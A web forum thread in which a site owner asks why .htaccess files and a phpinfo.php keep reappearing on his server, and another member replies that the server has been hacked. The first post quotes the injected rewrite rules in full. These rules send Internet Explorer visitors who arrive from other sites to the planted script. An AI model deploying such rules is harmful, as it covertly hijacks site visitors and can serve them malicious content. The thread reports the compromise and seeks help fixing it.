Anyone encountered this htaccess problem?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • conex
    Confirmed User
    • Dec 2002
    • 212

    #1

    Anyone encountered this htaccess problem?

    Hello.

    on one of my servers i been having this wired problem in the last few days.
    i keep getting this damn htaccess files on the root of my domain, inside them i see this:

    RewriteEngine On
    RewriteBase /
    RewriteRule ^$ index.shtml
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} !phpinfo.php
    RewriteCond %{HTTP_USER_AGENT} ^.*MSIE.* [NC]
    RewriteCond %{HTTP_REFERER} ^http:// [NC]
    RewriteCond %{HTTP_REFERER} !www.whopers .com [NC] (for example)
    RewriteRule ^(.*)\.(php|html|htm|shtml)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING} [L]
    RewriteRule ^js.js$ phpinfo.php?d=js [L]

    also a phpinfo.php is created mostly on the root of the domain. this damn htaccess file is messing with my trading script, i miss alot of hits from my trades and i see in my script HUGE amount of blocked traffic (i use atx).

    this happens only on 1 server, and no matter how much i try to delete those files they simply come back, we couldn't track down what makes the files.
    on the logs we see the file is created by created by www user which can be anything really. i am using arrow trader extreme and auto gallery sql on my server so i can't figure what causes this .

    if any of you ever encountered such a problem or have a clue about the cause please let me know.

    thanks ( icq 7247214 )
  • underthecovers
    Registered User
    • Sep 2003
    • 74

    #2
    Man you have a hacker on your machine. either a script is setup to automatically replace the .htaccess if delete it or he/she is coming back everytime and replacing it

    to many things to look for to tell you how its happening but it is happening

    you may need your sysadmin to get into it and find out how and why
    Some bulletin boards are full of security holes so thats my very first guess especially since phpinfo.php keeps getting created. the hacker is using that to determine what functionality your machine has

    God knows what else hes doing.

    you may also need a complete re-install to delete the virus if thats causing it

    Good luck I don't envy you
    Justcamming.Com Webcam Community
    Rebel Strip Poker
    The Best Text Links Are Managed Links (adult friendly)

    Comment

    Working...